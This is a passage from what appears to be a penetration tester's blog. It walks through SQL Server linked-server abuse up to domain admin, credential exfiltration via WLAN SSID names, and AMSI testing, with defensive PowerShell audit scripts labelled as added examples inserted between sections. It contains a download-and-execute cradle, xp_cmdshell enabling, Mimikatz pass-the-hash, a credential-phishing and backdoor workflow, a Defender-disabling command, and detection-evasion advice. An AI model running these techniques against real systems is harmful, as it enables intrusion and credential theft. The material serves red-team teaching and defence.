Since RPC Out is enabled on the linked server and we have sysadmin privileges, it is possible to enable xp_cmdshell and achieve OS command execution! Please note that if xp_cmdshell was already enabled on the linked server, we could execute OS commands without RPC Out using only OPENQUERY! Use the query below to enable xp_cmdshell:</div>
<pre><textarea cols="70" readonly="readonly" rows="1">EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "dps-sqlsrvtwo"</textarea></pre>
And let's see the privileges of the database process:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIRvMu5EPiM8U8myFaPlMvO2Ayz9mk0ZzBp2cd17w39WQ6OS4MltHs7dOdr6lNB1dF1kD_UO7ci5Qq4zCfb5mwT0Nytve13jz7b_XMghpPXZbYAIgyvtA9aAGzbKWvH47Qq3PUvsspt4E/s1600/whoami_sqlsrvtwo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIRvMu5EPiM8U8myFaPlMvO2Ayz9mk0ZzBp2cd17w39WQ6OS4MltHs7dOdr6lNB1dF1kD_UO7ci5Qq4zCfb5mwT0Nytve13jz7b_XMghpPXZbYAIgyvtA9aAGzbKWvH47Qq3PUvsspt4E/s400/whoami_sqlsrvtwo.jpg" width="400" /></a></div>
<br />
<div style="text-align: justify;">
Great! Looks like the SQL Server process is running with the privileges of a domain user (sqlprodadmin). We can now hunt for a DA token using the normal domain user privileges we have on dps-sqlsrvtwo. Let's use the awesome PowerView for the DA token hunting. Remember that we cannot access our linked server dps-sqlsrvtwo directly and we do not have command execution on dps-sqlsrvdev. To load PowerView on dps-sqlsrvtwo, we can download and execute it in memory using a PowerShell one-liner.</div>
<pre><textarea cols="70" readonly="readonly" rows="1">iex (New-Object Net.WebClient).DownloadString('http://yourwebserver/PowerView.ps1')</textarea></pre>
<div style="text-align: justify;">
The one-liner needs to be encoded so that the URL doesn't interfere with the syntax of the SQL query. Also, make sure that PowerView is modified slightly to include the function calls in the script itself, and that those calls are piped to Out-Host so that their output is returned.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikT_myyIYofxqXmQbfxKXyvZ2wZLeT1BGSz0qG_2keo00yckdyLVul2qlW8Tq2dWG8xqI__Hq2HejjGPHv5JUPQ-VLnRPpBtkR0kVxCFKe9ewGjTKrdHXDAawm0OX81XtxTOh51zoMKfE/s1600/DA-PowerView.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikT_myyIYofxqXmQbfxKXyvZ2wZLeT1BGSz0qG_2keo00yckdyLVul2qlW8Tq2dWG8xqI__Hq2HejjGPHv5JUPQ-VLnRPpBtkR0kVxCFKe9ewGjTKrdHXDAawm0OX81XtxTOh51zoMKfE/s400/DA-PowerView.jpg" width="400" /></a></div>
<div style="text-align: justify;">
And let's execute the encoded command:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj98Wvi-6mT7ohzKuyvwlU1IAkuUILKr_xL5JKcnNiqMz4QNlYKSu3cn5zF1ZJN9PlEQl5aaY5ROnByx8MQo6b2v43qAPRlIuaLz4jq60uWm0kiWvM_afONcl1fNedxytVSx0AX6XT1JSo/s1600/DA-UserHunting.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj98Wvi-6mT7ohzKuyvwlU1IAkuUILKr_xL5JKcnNiqMz4QNlYKSu3cn5zF1ZJN9PlEQl5aaY5ROnByx8MQo6b2v43qAPRlIuaLz4jq60uWm0kiWvM_afONcl1fNedxytVSx0AX6XT1JSo/s400/DA-UserHunting.jpg" width="400" /></a></div>
<div style="text-align: justify;">
Awesome! Looks like a DA token is available on the server dps-srvjump and our current user has local admin access there. Let's dump the NTLM hash of the DA (Administrator) from dps-srvjump using Invoke-Mimikatz.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitUF3WmGhyphenhyphenASz8YdHYSgD11Zv_7Onp5xcwYrYeZ3cHogslb_z_x3vSKh0AvJmAfogF9wP2kEHNZVP9IoQzGbGPRuesJugMTpkN_Xahs20xCaBnmlNXIyQVT7ww9zc_qiZAvZ-HpX0O3tY/s1600/DA-Hashes.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitUF3WmGhyphenhyphenASz8YdHYSgD11Zv_7Onp5xcwYrYeZ3cHogslb_z_x3vSKh0AvJmAfogF9wP2kEHNZVP9IoQzGbGPRuesJugMTpkN_Xahs20xCaBnmlNXIyQVT7ww9zc_qiZAvZ-HpX0O3tY/s400/DA-Hashes.jpg" width="400" /></a></div>
<div style="text-align: justify;">
Finally, let's use these hashes with Invoke-Mimikatz to run a command on the DC of defensiveps. The DC of defensiveps is accessible from our machine in the offensiveps forest.</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:defensiveps.com /ntlm:ntlmhash /run:powershell.exe"'
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_pPAx5eiCrzU6SwH-OzzRZlSe5nl6V7PhIAbxdVi7hNY0bPCarwKaxGW0elG_mlXMpIIh0KCTUKVMwrmFyeo86SWly23uI-J6DHPgAkChqqhUizHVN7XYIIHbJde54zsuU4sJt8kQ1Ww/s1600/DA-Command.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_pPAx5eiCrzU6SwH-OzzRZlSe5nl6V7PhIAbxdVi7hNY0bPCarwKaxGW0elG_mlXMpIIh0KCTUKVMwrmFyeo86SWly23uI-J6DHPgAkChqqhUizHVN7XYIIHbJde54zsuU4sJt8kQ1Ww/s400/DA-Command.jpg" width="400" /></a></div>
<br />
<div style="text-align: justify;">
Bingo! DA access in the target forest!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
We started with a non-admin domain user and worked our way to multiple SQL Servers while staying only at the database layer. We also got domain admin/enterprise admin in a trusting forest! :)</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
<b>Mitigations</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
SQL Server Level </div>
<div style="text-align: justify;">
Multiple common mitigations, such as limiting the number of linked servers and not enabling RPC Out on linked servers, would have helped. Restricting the privileges granted to logins, even to the public login, will also help. One of the databases we encountered later on was running with a domain user's privileges. This is disastrous, as it opens up many opportunities for privilege escalation at the domain level! Restricting the privileges with which the database processes run is always desirable. </div>
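As an added example (this is not code from the post, and not part of PowerUpSQL), the PowerShell below audits one SQL Server instance for the four conditions this chain relied on: linked servers with RPC Out enabled, xp_cmdshell switched on, sa-owned databases with TRUSTWORTHY on (the setting that lets a db_owner's EXECUTE AS OWNER procedure act with sa's server-level rights), and service accounts that are domain users. It assumes Windows-integrated access to the instance with VIEW SERVER STATE and VIEW ANY DEFINITION (or sysadmin) so the catalog views return every row; the instance name is a placeholder.

```powershell
# Added example; not part of the blog post or of PowerUpSQL.
# Audits a SQL Server instance for the settings abused in the chain above.
# Assumes Windows authentication plus VIEW SERVER STATE / VIEW ANY DEFINITION.

function Invoke-AuditQuery {
    param(
        [System.Data.SqlClient.SqlConnection] $Connection,
        [string] $Sql
    )
    $command = $Connection.CreateCommand()
    $command.CommandText = $Sql
    $table = New-Object System.Data.DataTable
    $reader = $command.ExecuteReader()
    try { $table.Load($reader) } finally { $reader.Close() }
    foreach ($row in $table.Rows) { $row }
}

function Get-SqlEscalationExposure {
    param([Parameter(Mandatory)] [string] $Instance)   # placeholder, e.g. 'dps-sqlsrvtwo'

    $connection = New-Object System.Data.SqlClient.SqlConnection(
        "Server=$Instance;Integrated Security=SSPI;Connection Timeout=10")
    $connection.Open()
    try {
        # 1. Linked servers: EXEC ('...') AT <server> only works when RPC Out is on.
        $linked = @(Invoke-AuditQuery $connection 'SELECT name, data_source, is_rpc_out_enabled FROM sys.servers WHERE is_linked = 1')
        # 2. xp_cmdshell: value_in_use is the running value, not merely the configured one.
        $cmdshell = @(Invoke-AuditQuery $connection "SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'")
        # 3. TRUSTWORTHY databases owned by sa (owner_sid 0x01): EXECUTE AS OWNER inside them
        #    carries sa's server-level rights. msdb is excluded because it is TRUSTWORTHY by design.
        $trustworthy = @(Invoke-AuditQuery $connection "SELECT name FROM sys.databases WHERE is_trustworthy_on = 1 AND owner_sid = 0x01 AND name <> 'msdb'")
        # 4. Service accounts: a domain user here gives OS command execution a domain identity.
        $services = @(Invoke-AuditQuery $connection 'SELECT servicename, service_account FROM sys.dm_server_services')
    }
    finally { $connection.Close() }

    $domainAccounts = $services |
        Where-Object { $_.service_account -notmatch '^(NT SERVICE\\|NT AUTHORITY\\|LocalSystem$)' } |
        ForEach-Object { "$($_.servicename) runs as $($_.service_account)" }

    [pscustomobject]@{
        Instance              = $Instance
        LinkedServersRpcOut   = @($linked | Where-Object { $_.is_rpc_out_enabled } | ForEach-Object { $_.name })
        XpCmdShellEnabled     = ($cmdshell.Count -gt 0 -and [int]$cmdshell[0].value_in_use -eq 1)
        TrustworthySaOwned    = @($trustworthy | ForEach-Object { $_.name })
        DomainServiceAccounts = @($domainAccounts)
    }
}

# Remediation for finding 1, per linked server that does not need RPC Out:
#   EXEC sp_serveroption @server = N'<linked server>', @optname = N'rpc out', @optvalue = N'false';
# and for finding 2:
#   EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;

Get-SqlEscalationExposure -Instance 'dps-sqlsrvtwo' | Format-List
```

Run it against each instance that appears in the linked-server map; a non-empty LinkedServersRpcOut together with a domain account in DomainServiceAccounts is exactly the combination that turned a database foothold into a domain one above.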
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Forest Level</div>
<div style="text-align: justify;">
Many improvements can be made. Allowing a local administrator on a box where a Domain Admin can log in is very, very dangerous and results in disastrous situations like the one we saw above. If there is a box where DA privileges are required, no other administrative account should be present on it. Logs will also tell you about a successful DA authentication from another forest, if someone is looking for such information. Also, Selective Authentication can help in forest trust scenarios. </div>
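The "someone looking at the logs" part, as an added example that is not code from the post: the function below parses Security event 4624 (in the XML form Get-WinEvent's ToXml() returns) and reports logons by a watch-list of privileged accounts on a member server such as a jump host. The watch-list entry and the sample event are constructed for this example; the live command at the end needs rights to read the Security log.

```powershell
# Added example; not code from the post. Reports logons by watched privileged accounts
# on a member server (a jump host, for instance) from Security event 4624 XML.
# The watch-list and the sample event below are constructed for this example.

function Get-PrivilegedLogon {
    param(
        [Parameter(Mandatory)] [string[]] $WatchedAccounts,              # 'DOMAIN\user' form
        [Parameter(Mandatory, ValueFromPipeline)] [string] $EventXml     # one event as XML
    )
    process {
        $xml = [xml]$EventXml
        $eventId = $xml.Event.System.EventID
        if ($eventId -is [System.Xml.XmlElement]) { $eventId = $eventId.InnerText }
        if ([int]$eventId -ne 4624) { return }

        $data = @{}
        foreach ($field in $xml.Event.EventData.Data) { $data[$field.GetAttribute('Name')] = $field.'#text' }
        $account = "$($data['TargetDomainName'])\$($data['TargetUserName'])"

        # Logon types 2 (console), 10 (RDP) and 11 (cached) leave credential material in LSASS,
        # which is what made the DA token on the jump host reusable. Type 3 (network) is skipped:
        # it is noisy and leaves no reusable token behind.
        $tokenLeaving = @('2', '10', '11')
        if ($WatchedAccounts -notcontains $account -or $data['LogonType'] -notin $tokenLeaving) { return }

        [pscustomobject]@{
            Time        = [datetime]$xml.Event.System.TimeCreated.SystemTime
            Host        = $xml.Event.System.Computer
            Account     = $account
            LogonType   = $data['LogonType']
            SourceIp    = $data['IpAddress']
            Workstation = $data['WorkstationName']
        }
    }
}

# Constructed sample: a DA RDP logon to the jump host, in the shape ToXml() produces.
$sampleEvent = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4624</EventID><TimeCreated SystemTime="2019-08-20T10:15:00.000Z"/>
    <Computer>dps-srvjump.defensiveps.com</Computer></System>
  <EventData>
    <Data Name="TargetUserName">Administrator</Data>
    <Data Name="TargetDomainName">DEFENSIVEPS</Data>
    <Data Name="LogonType">10</Data>
    <Data Name="IpAddress">10.10.1.50</Data>
    <Data Name="WorkstationName">ADMIN-WS01</Data>
  </EventData>
</Event>
'@

$watched = @('DEFENSIVEPS\Administrator')   # constructed watch-list; fill with the forest's admin accounts
$sampleEvent | Get-PrivilegedLogon -WatchedAccounts $watched

# Live use on the jump host (needs rights to read the Security log):
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624; StartTime = (Get-Date).AddDays(-1) } |
#     ForEach-Object { $_.ToXml() } | Get-PrivilegedLogon -WatchedAccounts $watched
```

A DA logon of type 2, 10 or 11 on any box that also has local administrators is the condition the Forest Level paragraph warns about, so the output is worth alerting on rather than just reviewing.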
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A note on ATA</div>
<div style="text-align: justify;">
I have <a href="https://docs.microsoft.com/en-us/advanced-threat-analytics/understand-explore/what-is-ata">Microsoft ATA</a> set up in the lab where all the attacks took place. Since ATA is the new sheriff in town, let's discuss it a bit. ATA detects anomalies by looking at the traffic destined to the DC(s) via port mirroring. If we can limit ourselves to those attacks and techniques where there is no or minimal interaction with a DC, it is possible to avoid ATA and still get access to the most interesting machines and information. ATA thrives on the Red Teamer's/attacker's desire to go for DA rights as soon as possible. It is not always necessary to go after DA and use Golden Ticket/Skeleton Key/credential replay attacks to achieve the goal of an assessment, unless, of course, you want to brag about it in your report :D Of course, there are bypasses for ATA as well, but why bypass it when you can avoid it :)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Hope you enjoyed the post. Please leave comments, feedback and questions.</div>
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com7tag:blogger.com,1999:blog-8135211063584500909.post-42300260959935427652016-11-22T02:07:00.001+05:302018-01-14T22:48:14.897+05:30Exfiltration of User Credentials using WLAN SSID<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
I was playing with the Windows Hosted Network feature a couple of days back. A hopefully useful idea which came to my mind was using the name of the hosted SSID for exfiltration. Since SSID names support a maximum of 32 bytes, the choice of data to exfiltrate is not really wide. Something like user credentials is small enough to fit in this limited space.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I wrote a PowerShell script which allows us to exfiltrate data using only SSID names. I give you <b>Invoke-SSIDExfil.ps1</b>. <a href="https://github.com/samratashok/nishang/blob/master/Gather/Invoke-SSIDExfil.ps1">Here is the source code.</a> The script provides multiple options to exfiltrate data. Since we are mostly after user credentials, the script uses logic from Invoke-CredentialsPhish to show a credentials prompt to the user and capture the credentials in clear text. The captured credentials are then encoded using ROT13 (I am not going to call ROT13 encryption, though that may be the technically correct term), and a Windows Hosted Network is created and started with the SSID name set to the encoded value in the form Domain:Username:Password. Below is the script in action. Please note that the script must be executed from an elevated shell:</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Invoke-SSIDExfil -Verbose
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_IgCE6rSCZlvTkfsg18QyUQ3DLMHnPvOBnhW0_kAI-giFzBNvQ3hBQvM42DbufuWfLKi4sZ8BfcBF_BGzFONFzRrFyGoaEXAEGm4tQK_OL93Rb8z9ZTgkkY4dnIgIDP5ODA0RswbjBEo/s1600/screenshot.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="56" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_IgCE6rSCZlvTkfsg18QyUQ3DLMHnPvOBnhW0_kAI-giFzBNvQ3hBQvM42DbufuWfLKi4sZ8BfcBF_BGzFONFzRrFyGoaEXAEGm4tQK_OL93Rb8z9ZTgkkY4dnIgIDP5ODA0RswbjBEo/s400/screenshot.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
And this is how the SSID looks if we are in <b>physical proximity</b> of the target:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgD1XRT0w91555EkZ1vl9v8JlERRGCUpe0BqqedhvFWJ1uwzf8QtTfUCIy53AJ0lUfpMUSfmgVogn_74-KMZXFTrRxMURk0fJxnNMjSjTr75-IlB7vgKoHVjRLxmRfX66Z1FNl0a93T4zk/s1600/mobile.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgD1XRT0w91555EkZ1vl9v8JlERRGCUpe0BqqedhvFWJ1uwzf8QtTfUCIy53AJ0lUfpMUSfmgVogn_74-KMZXFTrRxMURk0fJxnNMjSjTr75-IlB7vgKoHVjRLxmRfX66Z1FNl0a93T4zk/s320/mobile.png" width="288" /></a></div>
Now, we can decode the user credentials using the -Decode option of the Invoke-SSIDExfil script.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjArY9cvg590Xy5dN4VcwqtfmvhB5_P4GpfW9LQA3g9mWf9WLH-anFLvKR9DNaf_ieezWlITiDUkmH8M-poi0low5O2tY4UN2Sm56ZRvN_w77agxqXRyw_rxEprU-nG0hFthNWQcOhXqss/s1600/decode.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjArY9cvg590Xy5dN4VcwqtfmvhB5_P4GpfW9LQA3g9mWf9WLH-anFLvKR9DNaf_ieezWlITiDUkmH8M-poi0low5O2tY4UN2Sm56ZRvN_w77agxqXRyw_rxEprU-nG0hFthNWQcOhXqss/s400/decode.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Neat! From my past experience, such scripts are useful for impressive demonstrations.<br />
<br />
<div style="text-align: justify;">
The script can be used as a payload in targeted client side attacks, Human Interface Devices (<a href="https://github.com/samratashok/Kautilya">Kautilya</a>), authenticated command execution and other techniques. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Using the -StringToExfiltrate and -ExfilOnly parameters, it is also possible to exfiltrate a small piece of data without showing a credential prompt to the user. </div>
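From the defender's side, as an added example that is not part of Nishang or of this post: the check below parses the output of <code>netsh wlan show hostednetwork</code>, reports whether a hosted network is started on the machine, and flags an SSID that, once ROT13-decoded, has the three-field Domain:Username:Password layout described above. The netsh output and the SSID value (ROT13 of the placeholder LAB:alice:Summer2019) are constructed so the check runs offline.

```powershell
# Added example; not part of Nishang or of the post. Detects a Windows hosted network
# whose SSID carries ROT13-encoded Domain:Username:Password data, the layout used above.
# The netsh output below is constructed for an offline run.

function ConvertFrom-Rot13 {
    param([string] $Text)
    # ROT13 is its own inverse, so the same loop decodes what the exfil script encoded.
    $out = foreach ($c in $Text.ToCharArray()) {
        if     ($c -cmatch '[a-mA-M]') { [char]([int]$c + 13) }
        elseif ($c -cmatch '[n-zN-Z]') { [char]([int]$c - 13) }
        else                           { $c }
    }
    return -join $out
}

function Test-CredentialLikeSsid {
    param([string] $Ssid)
    # Three colon-separated, space-free fields inside the 32-byte SSID limit.
    if ([Text.Encoding]::UTF8.GetByteCount($Ssid) -gt 32) { return $false }
    return (ConvertFrom-Rot13 $Ssid) -match '^[^:\s]+:[^:\s]+:[^:\s]+$'
}

function Get-HostedNetworkFinding {
    param([string[]] $NetshOutput)   # lines from: netsh wlan show hostednetwork
    $ssid = $null; $status = $null
    foreach ($line in $NetshOutput) {
        if     ($line -match '^\s*SSID name\s*:\s*"(?<ssid>.*)"\s*$') { $ssid   = $Matches['ssid'] }
        elseif ($line -match '^\s*Status\s*:\s*(?<status>.+?)\s*$')  { $status = $Matches['status'] }
    }
    [pscustomobject]@{
        Ssid               = $ssid
        Started            = ($status -eq 'Started')
        CredentialLikeSsid = ($null -ne $ssid -and (Test-CredentialLikeSsid $ssid))
    }
}

# Constructed sample output; the SSID is ROT13 of the placeholder 'LAB:alice:Summer2019'.
$sampleNetsh = @'
Hosted network settings
-----------------------
    Mode                   : Allowed
    SSID name              : "YNO:nyvpr:Fhzzre2019"
    Max number of clients  : 100
    Authentication         : WPA2-Personal
    Cipher                 : CCMP

Hosted network status
---------------------
    Status                 : Started
    Number of clients      : 0
'@ -split "`r?`n"

Get-HostedNetworkFinding -NetshOutput $sampleNetsh
# Live: Get-HostedNetworkFinding -NetshOutput (netsh wlan show hostednetwork)
```

On a fleet where no machine should ever host an access point, Started alone is the finding; the decode heuristic is only there to tell a credential drop apart from a user's ad hoc hotspot.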
<br />
<b>An update to the Gupt-Backdoor</b><br />
<br />
<div style="text-align: justify;">
While working on this script, I revisited Gupt-Backdoor. That backdoor is quite impressive as well when it comes to demonstrations. I <a href="http://www.labofapenetrationtester.com/2014/08/Introducing-Gupt.html">blogged about it here</a>. An improvement has been added to the backdoor which allows passing a one-line PowerShell download-and-execute cradle for PowerShell v3 onwards. Also, ROT13 encoding has been implemented to make SSID names less suspicious. The command below can be used to start the backdoor on a target and tell it that an encoded command will be provided:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Gupt-Backdoor -MagicString op3n -EncodedCmd -Verbose
</textarea></pre>
And this is how a Wireless AP can be started to send instructions to the backdoor.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwGLbJMNwtvGNySaxMvJaAIU0lRdOklvC30VbH4jsU0f4CkO93gQHa6ZHsGpk1LL0no-qRyVCkOuSxjL52LQ-3RzXteS8u8fxM1il8eO_GZj4mLf1_KMCmiIQD7DPhetF4MCRSHomcjDc/s1600/gupt-instructions.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwGLbJMNwtvGNySaxMvJaAIU0lRdOklvC30VbH4jsU0f4CkO93gQHa6ZHsGpk1LL0no-qRyVCkOuSxjL52LQ-3RzXteS8u8fxM1il8eO_GZj4mLf1_KMCmiIQD7DPhetF4MCRSHomcjDc/s400/gupt-instructions.png" width="225" /></a></div>
<br />
And the execution looks like below. The backdoor downloads and executes Get-WLAN-Keys from Nishang:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1g3WoQpOSaphlT3_qQ5WCVEQGEQolOOIp-NHVBlz_of2BKbold4G-nkQ_x0kU3zQ5Nz8oMAb1MhIRhIqIcFmYvELCyjFkMP6Hg7hKvoNtdVhE9WNEVJYGrS0SZOL9_BdWL-d51fGPKmc/s1600/gupt-execution.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1g3WoQpOSaphlT3_qQ5WCVEQGEQolOOIp-NHVBlz_of2BKbold4G-nkQ_x0kU3zQ5Nz8oMAb1MhIRhIqIcFmYvELCyjFkMP6Hg7hKvoNtdVhE9WNEVJYGrS0SZOL9_BdWL-d51fGPKmc/s400/gupt-execution.jpg" width="400" /></a></div>
Small but useful improvements!<br />
<br />
Hope you enjoyed the post! Please leave feedback and comments.<br />
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com1tag:blogger.com,1999:blog-8135211063584500909.post-63950474315333030362016-09-21T22:35:00.002+05:302018-01-14T22:48:14.999+05:30AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It<div dir="ltr" style="text-align: left;" trbidi="on">
Update (23-Dec-2016) - I have implemented the publicly known AMSI bypasses described in this post in a PowerShell script <b>Invoke-AmsiBypass</b>. Check it out here <a href="https://github.com/samratashok/nishang/blob/master/Bypass/Invoke-AmsiBypass.ps1">https://github.com/samratashok/nishang/blob/master/Bypass/Invoke-AmsiBypass.ps1</a><br />
<br />
<br />
Last month I gave a talk about Microsoft's AntiMalware Scan Interface (AMSI) at Black Hat USA. The talk and this post detail my experiments with AMSI.<br />
<br />
I first encountered AMSI while using some of the PowerShell scripts from Nishang on a Windows 10 box in my lab. I noticed that some of the scripts didn't work even if loaded from memory, which was very interesting. Being a long-time user of PowerShell in my pen tests, I was interested in the technique being used to detect scripts from Nishang in memory. After a quick search, I stumbled upon this excellent <a href="https://blogs.technet.microsoft.com/mmpc/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/">TechNet article</a> which introduces AMSI. From that article, <a href="https://blogs.technet.microsoft.com/poshchap/2015/10/16/security-focus-defending-powershell-with-the-anti-malware-scan-interface-amsi/">this</a> article and the <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx">documentation</a> of AMSI, the following detection abilities and features are claimed for AMSI:<br />
<ul style="text-align: left;">
<li>Memory and stream scanning. This means that the input method (disk, memory/stream or manual input) makes no difference to the detection capabilities.</li>
<li>Scripts are submitted to the AntiVirus/AntiMalware product by AMSI when the de-obfuscated plain code is presented to the script host. This means that obfuscation should help only to a limited extent. </li>
<li>Since the scripts are "picked up" when submitted to the scripting host, code which doesn't use powershell.exe but uses the System.Management.Automation DLL will also be analyzed. </li>
</ul>
<br />
And when I tested AMSI with different tools and techniques, the detection rate was indeed better than I expected.<br />
<h4 style="text-align: left;">
Major techniques which were tested and detected by AMSI:</h4>
<br />
<b>Executing scripts from memory</b> - Using the -EncodedCommand parameter of powershell.exe and the famous one-liner download-execute.<br />
<br />
Execution of everyone's favorite, Invoke-Mimikatz:<br />
When AMSI was disabled:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Set-MpPreference -DisableIOAVProtection $true
</textarea></pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_zTGv-KLvlGJoyfmKu0Ec0XP1B9Pwrgve9YMdwoRfmjpJE7sADJ4rzvR2OtzdgybYcnDgP8awKBylUzi_c6aETeURLuw19eywZ7WBdm9KMn-l7Dusw80rvEtqBH6VIuM6N7TyeStceB4/s1600/AMSI_Disabled.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_zTGv-KLvlGJoyfmKu0Ec0XP1B9Pwrgve9YMdwoRfmjpJE7sADJ4rzvR2OtzdgybYcnDgP8awKBylUzi_c6aETeURLuw19eywZ7WBdm9KMn-l7Dusw80rvEtqBH6VIuM6N7TyeStceB4/s400/AMSI_Disabled.jpg" width="400" /></a></div>
<br />
When AMSI was enabled (default on Windows 10):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF5IVd9O-sIlZIhfEBSTPdeGI_x_WqF-QBuATra6TCv2QxZVEr7GY-WyUxl3ihG9pr8XWHoKlJR1aooPVYWxH5hO_hnwudP478u0Vr-UrEizvC7CCznp3zRYPzCbfNRaI6eGKkdgaw2WE/s1600/AMSI_ENabled.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="108" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF5IVd9O-sIlZIhfEBSTPdeGI_x_WqF-QBuATra6TCv2QxZVEr7GY-WyUxl3ihG9pr8XWHoKlJR1aooPVYWxH5hO_hnwudP478u0Vr-UrEizvC7CCznp3zRYPzCbfNRaI6eGKkdgaw2WE/s400/AMSI_ENabled.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0VN6O9y4UjxiiKqsG_rcEjr1Sg2-zMM5koFAxSqPqtZvDcGehosPJ-K5mU6dO3ozVv4JgWlgxXM1VH2v18LDsNTbbQwbSvmJ3LjXDd3bcJVc7lHhyphenhyphen7vHSm4TY9JtPTyG6b722xXHOMA0/s1600/AMSI_Enabled_Threat.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0VN6O9y4UjxiiKqsG_rcEjr1Sg2-zMM5koFAxSqPqtZvDcGehosPJ-K5mU6dO3ozVv4JgWlgxXM1VH2v18LDsNTbbQwbSvmJ3LjXDd3bcJVc7lHhyphenhyphen7vHSm4TY9JtPTyG6b722xXHOMA0/s400/AMSI_Enabled_Threat.jpg" width="400" /></a></div>
<br />
<br />
